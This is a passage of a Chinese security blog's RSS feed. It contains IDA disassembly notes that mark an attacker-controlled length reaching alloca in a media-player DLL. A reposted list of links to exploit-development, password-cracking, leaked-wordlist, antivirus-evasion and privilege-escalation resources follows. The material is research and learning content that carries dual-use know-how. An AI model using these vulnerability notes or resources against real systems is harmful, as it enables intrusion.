seg002:10005C40                 mov     edx, edi<br />
seg002:10005C42                 call    dword ptr [eax] ; call base.dll!!!!!!!!!!!!!!!!<br />
seg002:10005C42                                         ; 从文件里读ECX大小内容到刚开辟空间<br />
seg002:10005C44 ; 151:         free(v17);<br />
seg002:10005C44                 push    edi             ; Memory<br />
seg002:10005C45                 call    free<br />
seg002:10005C4B ; 152:         strncpy_ = strncmp;<br />
seg002:10005C4B                 mov     edi, strncmp<br />
seg002:10005C51                 add     esp, 4<br />
seg002:10005C54                 jmp     loc_10005AF7</p>
<p>另一来自base.dll<br />
seg000:1001083D                 pop     eax<br />
seg000:1001083E ; 100:       if ( v66 &gt; 0&#215;12 )  v66可控污染源<br />
seg000:1001083E                 cmp     [ebp+var_10], eax<br />
seg000:10010841                 jbe     short crash_inside<br />
seg000:10010843 ; 101:         v14 = v66;<br />
seg000:10010843                 mov     eax, [ebp+var_10]<br />
seg000:10010846 ; 102:       v15 = v14 + 3;<br />
seg000:10010846<br />
seg000:10010846 crash_inside:                           ; CODE XREF: crash_here__+242j<br />
seg000:10010846                 add     eax, 3<br />
seg000:10010849 ; 103:       LOBYTE(v15) = v15 &amp; 0xFC;<br />
seg000:10010849                 and     al, 0FCh<br />
seg000:1001084B ; 104:       v16 = alloca(v15);<br />
seg000:1001084B                 call    __alloca_probe<br />
seg000:10010850 ; 105:       v4 = &amp;v39;<br />
seg000:10010850                 mov     ebx, esp<br />
seg000:10010852 ; 106:       sub_10001974(v5, &amp;v39, v66);</p>
<p>bass_wv.dll的里面看了半天,想搞个什么use after free,double free什么的,可惜没找到啊,小遗憾啦</p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2010/01/internet-explorer-aurora-exploit/' rel='bookmark' title='Permanent Link: Internet Explorer Aurora Exploit'>Internet Explorer Aurora Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/01/zzrising-antivirus-200820092010-local-privilege-escalation-exploit/' rel='bookmark' title='Permanent Link: [zz]Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit'>[zz]Rising AntiVirus 2008/2009/2010 Local Privilege Escalation Exploit</a></li>
<li><a href='http://cq-cser.cn/2010/09/%e5%85%b3%e4%ba%8eesp%e5%ae%9a%e5%be%8b/' rel='bookmark' title='Permanent Link: 关于esp定律'>关于esp定律</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/11/kankan-stackoverflowdos-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Blogs, Feeds, Guides &amp; Links[zz]</title>
		<link>http://cq-cser.cn/2011/11/blogs-feeds-guides-linkszz/</link>
		<comments>http://cq-cser.cn/2011/11/blogs-feeds-guides-linkszz/#comments</comments>
		<pubDate>Sun, 13 Nov 2011 10:33:15 +0000</pubDate>
		<dc:creator>cq</dc:creator>
				<category><![CDATA[sec]]></category>

		<guid isPermaLink="false">http://cq-cser.cn/?p=1520</guid>
		<description><![CDATA[原文：http://g0tmi1k.blogspot.com/2011/11/blog-guides-links.html 顺便FK GFW 特别推荐http://j00ru.vexillium.org/?p=893此系列 Programming/Coding [Bash] Advanced Bash-Scripting Guide &#8211; http://tldp.org/LDP/abs/html/ [Bash] Bash shell scripting tutorial &#8211; http://steve-parker.org/sh/sh.shtml [Bash] Bourne Shell Reference &#8211; http://linuxreviews.org/beginner/bash_GNU_Bourne-Again_SHell_Reference/ [CheatSheet] Scripting Languages: PHP, Perl, Python, Ruby &#8211; http://hyperpolyglot.org/scripting Offensive Security&#8217;s Pentesting With BackTrack (PWB) Course [Pre-course] Corelan Team &#8211; http://www.corelan.be [Pre-course] The Penetration Testing Execution Standard &#8211; http://www.pentest-standard.org/index.php/Main_Page [Hash] NTLM [...]


Related posts:<ol><li><a href='http://cq-cser.cn/2012/05/simple-version-of-2012-0158/' rel='bookmark' title='Permanent Link: simple version of 2012-0158'>simple version of 2012-0158</a></li>
<li><a href='http://cq-cser.cn/2012/03/%e5%88%a9%e7%94%a8%e6%8a%80%e6%9c%af%e6%95%b4%e7%90%86/' rel='bookmark' title='Permanent Link: 利用技术整理'>利用技术整理</a></li>
<li><a href='http://cq-cser.cn/2012/04/feiq2008-2-5-0-0/' rel='bookmark' title='Permanent Link: feiq2008.2.5.0.0'>feiq2008.2.5.0.0</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>原文：http://g0tmi1k.blogspot.com/2011/11/blog-guides-links.html<br />
顺便FK GFW<br />
特别推荐http://j00ru.vexillium.org/?p=893此系列<span id="more-1520"></span></p>
<p>Programming/Coding<br />
[Bash] Advanced Bash-Scripting Guide &#8211; http://tldp.org/LDP/abs/html/<br />
[Bash] Bash shell scripting tutorial &#8211; http://steve-parker.org/sh/sh.shtml<br />
[Bash] Bourne Shell Reference &#8211; http://linuxreviews.org/beginner/bash_GNU_Bourne-Again_SHell_Reference/<br />
[CheatSheet] Scripting Languages: PHP, Perl, Python, Ruby &#8211; http://hyperpolyglot.org/scripting</p>
<p>Offensive Security&#8217;s Pentesting With BackTrack (PWB) Course<br />
[Pre-course] Corelan Team &#8211; http://www.corelan.be<br />
[Pre-course] The Penetration Testing Execution Standard &#8211; http://www.pentest-standard.org/index.php/Main_Page<br />
[Hash] NTLM Decrypter &#8211; http://www.md5decrypter.co.uk/ntlm-decrypt.aspx<br />
[Hash] reverse hash search and calculator &#8211; http://goog.li</p>
<p>http://security.crudtastic.com/?p=213</p>
<p>Tunnelling / Pivoting<br />
[Linux] SSH gymnastics with proxychains &#8211; http://pauldotcom.com/2010/03/ssh-gymnastics-with-proxychain.html<br />
[Windows] Nessus Through SOCKS Through Meterpreter &#8211; http://www.digininja.org/blog/nessus_over_sock4a_over_msf.php</p>
<p>WarGames / Online Challenges<br />
[WarGames] Title &#8211; http://securityoverride.com<br />
[WarGames] Title &#8211; http://intruded.net<br />
[Challenge] The Ksplice Pointer Challenge &#8211; http://blogs.oracle.com/ksplice/<br />
[WarGames] Title &#8211; http://spotthevuln.com<br />
[WarGames] Title &#8211; http://cvo-lab.blogspot.com/2011/05/iawacs-2011-forensics-challenge.html<br />
[WarGames] Title &#8211; http://ftp.hackerdom.ru/ctf-images/</p>
<p>Exploit Development (Programs)<br />
[Download] Title &#8211; http://www.oldapps.com/<br />
[Download] Title &#8211; http://www.oldversion.com/<br />
[Download] Title &#8211; http://www.exploit-db.com/webapps/</p>
<p>Misc<br />
[RSS] Open Penetration Testing Bookmarks Collection &#8211; https://code.google.com/p/pentest-bookmarks/downloads/list<br />
[ExploitDev] Data mining Backtrack 4 for buffer overflow return addresses  &#8211; http://insidetrust.blogspot.com/2010/12/data-mining-backtrack-4-for-buffer.html<br />
[DIY] Repair a Broken Ethernet Plug &#8211; http://www.instructables.com/id/Repair-a-Broken-Ethernet-Plug/step5/Make-its-Head-Thin/<br />
[Desktop] Ubuntu Security &#8211; http://ubuntuforums.org/showthread.php?t=510812<br />
[TechHumor] Title &#8211; https://www.xkcd.com<br />
[TechHumor] Title &#8211; http://www.blackhat.com/presentations/bh-europe-05/BH_EU_05-Long.pdf </p>
<p>Exploit Development<br />
[Guides] Corelan Team &#8211; http://www.corelan.be<br />
[Guide] From 0&#215;90 to 0x4c454554, a journey into exploitation.  &#8211; http://myne-us.blogspot.com/2010/08/from-0&#215;90-to-0x4c454554-journey-into.html<br />
[Guide] An Introduction to Fuzzing: Using fuzzers (SPIKE) to find vulnerabilities &#8211; http://resources.infosecinstitute.com/intro-to-fuzzing/<br />
[Video] TiGa&#8217;s Video Tutorial Series on IDA Pro &#8211; http://www.woodmann.com/TiGa/idaseries.html<br />
[Guide] Advanced Windows Buffer Overflows &#8211; http://labs.snort.org/awbo/<br />
[Guide] Stack Based Windows Buffer Overflow Tutorial &#8211; http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.htmlt<br />
[Guide] SEH Stack Based Windows Buffer Overflow Tutorial &#8211; http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html<br />
[Guide] Windows Buffer Overflow Tutorial: Dealing with Character Translation &#8211; http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html<br />
[Guide] Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability< &#8211; http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html<br />
[Guide] Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump &#8211; http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html<br />
[Linux] Linux exploit development part 1 – Stack overflow. &#8211; http://sickness.tor.hu/?p=363<br />
[Linux] Linux Exploit Writing Tutorial Pt 2 – Stack Overflow ASLR bypass Using ret2reg &#8211; http://sickness.tor.hu/?p=365<br />
[Linux] Linux exploit development part 3 – ret2libc &#8211; http://sickness.tor.hu/?p=368<br />
[Linux] Linux exploit development part 4 – ASCII armor bypass + return-to-plt &#8211; http://sickness.tor.hu/?p=378<br />
[TechHumor] Title &#8211; https://www.youtube.com/watch?v=klXFqtYR5Mg<br />
[TechHumor] Title &#8211; http://amolnaik4.blogspot.com/2011/06/exploit-development-with-monapy.html</p>
<p>Exploit Development (Case Studies/Walkthroughs)<br />
[Web] Finding 0days in Web Applications &#8211; http://www.exploit-db.com/finding-0days-in-web-applications/<br />
[Windows] Offensive Security Exploit Weekend &#8211; http://www.corelan.be/index.php/2010/11/13/offensive-security-exploit-weekend/<br />
[Windows] From vulnerability to exploit under 5 min  &#8211; http://0entropy.blogspot.com/2011/02/from-vulnerability-to-exploit-under-5.html</p>
<p>Exploit Development (Patch Analysis)<br />
[Windows] A deeper look at ms11-058 &#8211; http://www.skullsecurity.org/blog/2011/a-deeper-look-at-ms11-058<br />
[Windows] Patch Analysis for MS11-058 &#8211; https://community.qualys.com/blogs/securitylabs/2011/08/23/patch-analysis-for-ms11-058<br />
[Windows] CVE-2011-1281: A story of a Windows CSRSS Privilege Escalation vulnerability &#8211; http://j00ru.vexillium.org/?p=893<br />
[Mobile] Analyzing and dissecting Android applications for security defects and vulnerabilities &#8211; https://www.net-security.org/article.php?id=1613</p>
<p>Exploit Development (Metasploit Wishlist)<br />
[ExplotDev] Metasploit Exploits Wishlist !  &#8211; http://esploit.blogspot.com/2011/03/metasploit-exploits-wishlist.html<br />
[Guide] Porting Exploits To Metasploit Part 1 &#8211; http://www.securitytube.net/video/2118</p>
<p>Passwords &#038; Rainbow Tables (WPA)<br />
[RSS] Title &#8211; http://ob-security.info/?p=475<br />
[RSS] Title &#8211; http://nakedsecurity.sophos.com/2011/06/14/the-top-10-passcodes-you-should-never-use-on-your-iphone/<br />
[RSS] Title &#8211; http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html<br />
[WPA] Offensive Security: WPA Rainbow Tables &#8211; http://www.offensive-security.com/wpa-tables/<br />
[Tool] Ultra High Security Password Generator &#8211; https://www.grc.com/passwords.htm<br />
[Guide] Creating effective dictionaries for password attacks  &#8211; http://insidetrust.blogspot.com/2010/07/creating-effective-dictionaries-for.html<br />
[Leaked] Diccionarios con Passwords de Sitios Expuestos &#8211; http://www.dragonjar.org/diccionarios-con-passwords-de-sitios-expuestos.xhtml<br />
[Download] Index of / &#8211; http://svn.isdpodcast.com/wordlists/<br />
[Guide] Using Wikipedia as brute forcing dictionary &#8211; http://lab.lonerunners.net/blog/using-wikipedia-as-brute-forcing-dictionary<br />
[Tool] CeWL &#8211; Custom Word List generator &#8211; http://www.digininja.org/projects/cewl.php<br />
[Download] Title &#8211; http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists<br />
[Leaked] Passwords &#8211; http://www.skullsecurity.org/wiki/index.php/Passwords</p>
<p>Cheat-Sheets<br />
[OS] A Sysadmin&#8217;s Unixersal Translator  &#8211; http://bhami.com/rosetta.html<br />
[WiFi] WirelessDefence.org&#8217;s Wireless Penetration Testing Framework &#8211; http://www.wirelessdefence.org/Contents/Wireless%20Pen%20Test%20Framework.html</p>
<p>Anti-Virus<br />
[Metasploit] Facts and myths about antivirus evasion with Metasploit &#8211; http://schierlm.users.sourceforge.net/avevasion.html<br />
[Terms] Methods of bypassing Anti-Virus (AV) Detection &#8211; NetCat &#8211; http://compsec.org/security/index.php/anti-virus/283-anti-virus-central-methods-of-bypassing-anti-virus-av-detection.html</p>
<p>Privilege Escalation<br />
[Linux] Hacking Linux Part I: Privilege Escalation &#8211; http://www.dankalia.com/tutor/01005/0100501004.htm<br />
[Windows] Windows 7 UAC whitelist &#8211; http://www.pretentiousname.com/misc/win7_uac_whitelist2.html<br />
[Windows] Windows Privilege Escalation Part 1: Local Administrator Privileges &#8211; http://www.netspi.com/blog/2009/10/05/windows-privilege-escalation-part-1-local-administrator-privileges/ </p>
<p>Metasploit<br />
[Guide] fxsst.dll persistence: the evil fax machine &#8211; http://www.room362.com/blog/2011/6/27/fxsstdll-persistence-the-evil-fax-machine.html<br />
[Guide] Bypassing DEP/ASLR in browser exploits with McAfee and Symantec &#8211; http://www.scriptjunkie.us/2011/08/custom-payloads-in-metasploit-4/<br />
[Guides] Metasploit Unleashed &#8211; http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training<br />
[Guides] Metasploit Megaprimer (Exploitation Basics And Need For Metasploit) Part 1 &#8211; http://www.securitytube.net/video/1175</p>
<p>Default Generators<br />
[WEP] mac2wepkey &#8211; Huawei default WEP generator &#8211; http://websec.ca/blog/view/mac2wepkey_huawei<br />
[WEP] Generator: Attacking SKY default router password &#8211; http://sec.jetlib.com/BackTrack_Linux_Forums/2011/01/12/Generator:_Attacking_SKY_default_router_password</p>
<p>Statistics<br />
[Defacements] Zone-H &#8211; http://www.zone-h.org<br />
[ExploitKits] CVE Exploit Kit list &#8211; http://exploitkit.ex.ohost.de/CVE%20Exploit%20Kit%20List.htm</p>
<p>Cross Site Scripting (XSS)<br />
[Guide] vbSEO – From XSS to Reverse PHP Shell &#8211; http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/<br />
[RSS] Title &#8211; http://www.thespanner.co.uk/2009/03/25/xss-rays/ </p>
<p>Podcasts<br />
[Weekly] PaulDotCom &#8211; http://pauldotcom.com/podcast/psw.xml<br />
[Monthly] Social-Engineer &#8211; http://socialengineer.podbean.com/feed/</p>
<p>Blogs &#038; RSS<br />
[RSS] SecManiac &#8211; http://www.secmaniac.com<br />
[Guides] Carnal0wnage &#038; Attack Research &#8211; http://carnal0wnage.attackresearch.com<br />
[RSS] Contagio &#8211; http://contagiodump.blogspot.com<br />
[News] THN : The Hacker News &#8211; http://thehackernews.com<br />
[News] Packet Storm: Full Disclosure Information Security &#8211; http://packetstormsecurity.org<br />
[Guides] pentestmonkey | Taking the monkey work out of pentesting &#8211; http://pentestmonkey.net<br />
[RSS] Darknet &#8211; The Darkside | Ethical Hacking, Penetration Testing &#038; Computer Security &#8211; http://www.darknet.org.uk<br />
[RSS] Irongeek &#8211; http://www.irongeek.com<br />
[Metasploit] Room 363 &#8211; http://www.room362.com<br />
[Guides] Question Defense: Technology Answers For Technology Questions &#8211; http://www.question-defense.com/<br />
[Guides] stratmofo&#8217;s blog  &#8211; http://securityjuggernaut.blogspot.com<br />
[Guides] TheInterW3bs &#8211; http://theinterw3bs.com</p>
<p>[Guides] consolecowboys &#8211; http://console-cowboys.blogspot.com<br />
[Guides] A day with Tape &#8211; http://adaywithtape.blogspot.com<br />
[Guides] Cybexin&#8217;s Blog &#8211; Network Security Blog &#8211; http://cybexin.blogspot.com</p>
<p>[RSS] BackTrack Linux &#8211; Penetration Testing Distribution &#8211; http://www.backtrack-linux.org/feed/<br />
[RSS] Offensive Security &#8211; http://www.offensive-security.com/blog/feed/</p>
<p>[RSS] Title &#8211; http://www.pentestit.com<br />
[RSS] Title &#8211; http://michael-coates.blogspot.com<br />
[RSS] Title &#8211; http://blog.0x0e.org<br />
[RSS] Title &#8211; http://0&#215;80.org/blog<br />
[RSS] Title &#8211; http://archangelamael.shell.tor.hu<br />
[RSS] Title &#8211; http://archangelamael.blogspot.com<br />
[RSS] Title &#8211; http://www.coresec.org<br />
[RSS] Title &#8211; http://noobys-journey.blogspot.com<br />
[RSS] Title &#8211; http://www.get-root.com<br />
[RSS] Title &#8211; http://www.kislaybhardwaj.com<br />
[RSS] Title &#8211; https://community.rapid7.com/community/metasploit/blog<br />
[RSS] Title &#8211; http://mimetus.blogspot.com<br />
[RSS] Title &#8211; http://hashcrack.blogspot.com<br />
[RSS] Title &#8211; https://rephraseit.wordpress.com<br />
[RSS] Title &#8211; http://www.exploit-db.com<br />
[RSS] Title &#8211; http:/skidspot.blogspot.com<br />
[RSS] Title &#8211; http://grey-corner.blogspot.com<br />
[RSS] Title &#8211; http://vishnuvalentino.com<br />
[RSS] Title &#8211; http://ob-security.info</p>
<p>&#8230;. Not enough? Try twitter and/or IRC!</p>


<p>Related posts:<ol><li><a href='http://cq-cser.cn/2012/05/simple-version-of-2012-0158/' rel='bookmark' title='Permanent Link: simple version of 2012-0158'>simple version of 2012-0158</a></li>
<li><a href='http://cq-cser.cn/2012/03/%e5%88%a9%e7%94%a8%e6%8a%80%e6%9c%af%e6%95%b4%e7%90%86/' rel='bookmark' title='Permanent Link: 利用技术整理'>利用技术整理</a></li>
<li><a href='http://cq-cser.cn/2012/04/feiq2008-2-5-0-0/' rel='bookmark' title='Permanent Link: feiq2008.2.5.0.0'>feiq2008.2.5.0.0</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://cq-cser.cn/2011/11/blogs-feeds-guides-linkszz/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

